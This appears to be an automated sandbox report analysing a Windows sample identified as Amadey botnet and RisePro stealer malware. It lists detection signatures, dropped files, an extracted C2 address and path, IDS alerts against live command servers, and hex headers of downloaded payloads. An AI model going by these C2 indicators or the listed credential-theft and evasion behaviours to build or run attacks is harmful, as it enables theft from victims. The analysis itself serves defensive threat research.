Windows Analysis Report
UeW2b6mU6Z.exe

Overview

General Information

Sample name: UeW2b6mU6Z.exe
renamed because original name is a hash value
Original sample name: a0de5117f2db3409eeb42464b5c2e811.exe
Analysis ID: 1428439
MD5: a0de5117f2db3409eeb42464b5c2e811
SHA1: 20300a63f6c8ccce917110e53bd8d4f1a49407fc
SHA256: 3ed276242a69770fe215a6cb9941f57e24eb2289635c65c54353fe62ea015e8e
Tags: 32exetrojan
Infos:

Detection

Amadey, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: UeW2b6mU6Z.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll Avira: detection malicious, Label: TR/ClipBanker.tbxxw
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 26.2.rundll32.exe.6c8b0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": ["193.233.132.167/enigma/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll ReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: UeW2b6mU6Z.exe ReversingLabs: Detection: 39%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: UeW2b6mU6Z.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 26.2.rundll32.exe.6c8b0000.0.unpack String decryptor: 193.233.132.167
Source: 26.2.rundll32.exe.6c8b0000.0.unpack String decryptor: /enigma/index.php
Uses 32bit PE files
Source: UeW2b6mU6Z.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb< source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdbC source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Management.pdbpdbent.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D611000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.4:49737
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49741 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49742 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49743 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49745 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49762 -> 193.233.132.56:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.167 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 193.233.132.167
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49799 -> 147.45.47.93:58709
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:02 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:03 GMTContent-Type: application/octet-streamContent-Length: 1937408Last-Modified: Thu, 18 Apr 2024 21:23:11 GMTConnection: keep-aliveETag: "66218f3f-1d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2a 52 e4 13 6e 33 8a 40 6e 33 8a 40 6e 33 8a 40 35 5b 89 41 60 33 8a 40 35 5b 8f 41 f0 33 8a 40 bb 5e 8e 41 7c 33 8a 40 bb 5e 89 41 7a 33 8a 40 bb 5e 8f 41 1b 33 8a 40 35 5b 8e 41 7a 33 8a 40 35 5b 8b 41 7d 33 8a 40 6e 33 8b 40 ba 33 8a 40 f5 5d 83 41 6f 33 8a 40 f5 5d 75 40 6f 33 8a 40 f5 5d 88 41 6f 33 8a 40 52 69 63 68 6e 33 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 15 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 aa 01 00 00 00 00 00 00 b0 4c 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4c 00 00 04 00 00 c6 c6 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 06 00 6a 00 00 00 00 60 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9b 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 9b 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2b 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 78 63 6e 61 72 75 69 00 80 1a 00 00 20 32 00 00 7e 1a 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 78 67 67 68 72 63 62 00 10 00 00 00 a0 4c 00 00 04 00 00 00 6a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4c 00 00 22 00 00 00 6e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:09 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Thu, 18 Apr 2024 21:22:12 GMTConnection: keep-aliveETag: "66218f04-11cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 8f 21 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 b9 21 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 